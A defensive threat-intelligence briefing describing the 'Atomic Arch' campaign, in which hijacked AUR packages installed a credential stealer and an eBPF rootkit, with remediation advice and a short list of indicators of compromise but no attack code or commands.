One of the largest supply chain attacks ever aimed at the Arch Linux community quietly turned hundreds of trusted software packages into traps for developers. Attackers hijacked abandoned entries in the Arch User Repository (AUR), the community run catalog of build recipes for the popular Linux distribution, and rigged them to install a credential stealer and a hard to spot kernel level rootkit. Researchers at Sonatype, who named the campaign Atomic Arch, count roughly 1,500 compromised packages, with the activity first flagged by independent researcher Michael Taggart.
What happened
The AUR is a community maintained collection of build scripts (called PKGBUILDs) for software that is not in Arch's official repositories. It is convenient but, by design, not vetted, which is exactly what the attackers leaned on. The campaign came in two waves: an initial 408 packages backdoored starting June 11, 2026, swelling to more than 1,500 a day later. Arch's official repositories were never touched, only the community AUR.
How the attack works
Rather than break in, the attackers abused a normal community process. When an AUR package is abandoned by its maintainer, other users can request to adopt it. The attackers took over these orphaned but still widely used packages (and in some cases spoofed trusted publishers), then edited the build script to add a post install step that quietly pulls down a malicious package called atomic-lockfile. Anyone who built one of the tampered packages ran the payload: a Rust based credential stealer that, on any system where it gained root access, could also load an eBPF rootkit, kernel level code (referenced inside the malware as scales.bpf.c) that hides its own processes, files, and network traffic from monitoring tools.
What it steals
Built for developer workstations and build servers, the stealer targets exactly the secrets that let an intruder spread further: GitHub and npm credentials, SSH keys, HashiCorp Vault tokens, Docker and Podman credentials, VPN materials, browser and Electron application data, and messages or tokens from Slack, Microsoft Teams, Discord, and Telegram, along with shell histories. It bundles the haul and ships it out over ordinary web uploads.
What you should do
Anyone who installed or rebuilt an AUR package since June 10 should assume compromise. Sonatype and the Arch maintainers advise rotating every credential that touched the machine (cloud keys, SSH keys, tokens, and passwords) and, because an eBPF rootkit can survive ordinary cleanup, seriously weighing a full reinstall of the system. Arch maintainers are removing the malicious commits and banning the accounts behind them. The episode is a reminder that community package repositories are a soft underbelly of the software supply chain, echoing recent campaigns that hid malware in npm and VS Code projects and the wider trend of attackers treating open source dependencies as a force multiplier. Sonatype's findings are laid out in the original report.
Indicators of compromise
- Malicious npm package: atomic-lockfile
- Credential stealer binary: an ELF file named deps
- eBPF rootkit component referenced in the payload: scales.bpf.c
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.